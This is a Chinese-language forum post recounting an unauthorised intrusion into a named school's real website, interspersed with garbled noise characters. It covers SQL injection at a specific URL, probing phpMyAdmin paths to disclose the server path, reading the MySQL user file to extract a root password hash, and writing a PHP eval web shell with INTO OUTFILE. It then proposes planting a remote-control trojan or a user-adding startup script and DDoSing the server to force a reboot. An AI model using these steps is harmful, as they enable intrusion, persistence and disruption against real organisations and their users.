友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
) }, C$ P( H* U+ Y2 ~8 Z6 e1 F8 J发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



: U+ V/ S2 c$ d2 i6 n$ @0 T常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
2 V4 J5 V; w* {) K
# h& V0 q. P4 M; G5 c那么想可以直接写入shell ，getshell有几个条件：
* p/ B& E1 H4 p  O4 I

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

' ?# T, \. \1 V: {试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
1 {  K' L* }" v" \" {2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
) k9 u- p+ U: g$ _# i0 }+ s* G9 [5 R8./phpmyadmin/libraries/export/xls.php  
, \( a% I% _4 v2 p- \% ?
) T' E  |; C( W1 O$ y均不行...........................
: ^  Q9 C/ t3 |- F3 U  T
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
* o/ ?- A0 \& P; l
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

3 X, N6 H4 E# N$ E! r默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

: ?+ K, a  B2 y. n7 @敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
! U$ J; K0 [# d1 S" O. ?; G
( i2 F: |2 r9 f4 Z想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

4 w7 n* f7 c1 \' P$ }& @- Q: _; N自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

17---- r(0072)
/ b( ]7 |0 x+ {8 y18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
; U) F. F$ O1 c: d  Z22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
; O4 G. ]! S- v) C+ G; m30---- 8(0038)
! ?2 s, O* j$ \, T; I# \# n31---- A(0041)
. c/ G7 C5 f' n  s4 k32---- 9(0039)
0 @# Q+ N: [/ v3 t1 @$ E$ p33---- B(0042)
7 l" ~( s, s; H" G34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
, j7 \2 K" A4 A% m% V; ^37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
# Z" R* h+ ?& v9 a& h& |41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
1 M* w+ t% F$ [4 @' }1 D44---- 5(0035)
* c$ E- ~8 d7 g+ E& X( K" s* O45---- 9(0039)
46---- 8(0038)
1 j7 k' E0 q& D2 Z- Z* h47---- F(0046)
) F0 B$ S( }' v  X: s- }5 ^48---- F(0046)
7 ~% ]: S2 `; |' U49---- 4(0034)
! s& [+ ?" H# Q5 \& j( Y50---- F(0046)
51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
8 {8 D# A9 M7 R56---- A(0041)
9 Y) ?% \: Q- g* @$ G/ F57---- B(0042)
, D9 s8 C7 L1 d+ R: s- c& Z58---- *(0044)
# G. M8 c9 q4 |  P5 {; y59---- *(0035)
- z3 G! C0 P! J/ q" m0 w6 o  z) f60---- *(0041)
  h7 j5 ^* C9 ?! K61---- *0032)
1 X7 P  G+ b; g- s
解密后成功登陆phpmyamin
/ d+ {) ^! ^6 t( e" h; J! n4 M+ w                          

* e( k; i* e# G9 H) Z6 X4 ?2 L                             
- l: p& ?9 w9 Z  e
) t) q+ V1 G, `0 }% G8 ?找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 E. X) S' r6 z: \! I
7 G2 _* K; _; l5 V4 `6 Y  u成功执行，拿下shell，菜刀连接：

, [7 c3 }. w4 r2 @- e# f2 K服务器不支持asp,aspx,php提权无果...................
0 r% g1 n6 j, ?
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
: |% `7 y$ z8 Y2 |1 \注释     管理员对计算机/域有不受限制的完全访问权

成员

9 D- ~/ z/ P" @

-------------------------------------------------------------------------------
admin
Administrator
slipper$
sqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
/ j" b1 z/ l5 z) l
ddos服务器重启，不然就只能坐等服务器重启了...............................
7 E3 ?. c" c; l+ C( D0 }
' t7 \! H( a; ~; }* n: G. k  S      

, t- _4 ]) x& `8 o: J9 U* a

angel